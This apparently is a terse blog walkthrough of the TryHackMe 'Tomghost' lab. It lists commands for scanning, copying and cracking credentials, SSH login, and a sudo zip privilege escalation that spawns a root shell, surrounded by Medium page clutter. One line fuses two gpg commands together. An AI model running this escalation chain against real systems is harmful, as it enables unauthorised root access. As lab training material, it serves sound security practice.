Tomghost Walkthrough — TryHackMe — Most Descriptive

sudo openvpn <your pack name>
sudo nmap -sS -sV -Pn <IP>
  • -sS → SYN Scan | Details here | More Stealthy and Faster
  • -sV → Detecting Version | Important | Helps in finding exploits
  • -Pn → No ping scan | Sometimes target blocks ping requests, so don’t ever forget to specify this
You will get credentials in the format <username>:<password>
scp <username>@<ip>:<full path of file> <path where you want to store file on your computer>
Now we have both the files in the Tomghost directory on host (our) computer
john --show <hash file you created>
gpg --import tryhackme.ascgpg --decrypt credential.pgp
ssh <username>@<ip>
TF=$(mktemp -u)
sudo zip $TF /etc/hosts -T -TT 'sh #'
sudo rm $TF
find / -type f -name root.txt 2>/dev/null
I use Kali :)

--

--

--

Hecker :P

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

KickEX stays on guard of users’ safety

DevOps and Tech: Why IT Needs White Knights

Daily links of Fernand0 — Enlaces diarios de Fernand0 — Issue #322

Risk of 5G

Pros and Cons of Digital Devices

{UPDATE} Breach and Clear Hack Free Resources Generator

Hacker bootcamp raises impact funds as job-training initiative

Tik​​Tok new rules, video will be deleted

TikTok

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Leafy-Pro

Leafy-Pro

Hecker :P

More from Medium

TryHackMe: Wreath

How The Hacker Hack You Just with a Link

HTB: Secret

Dante ProLabs (HackTheBox) Review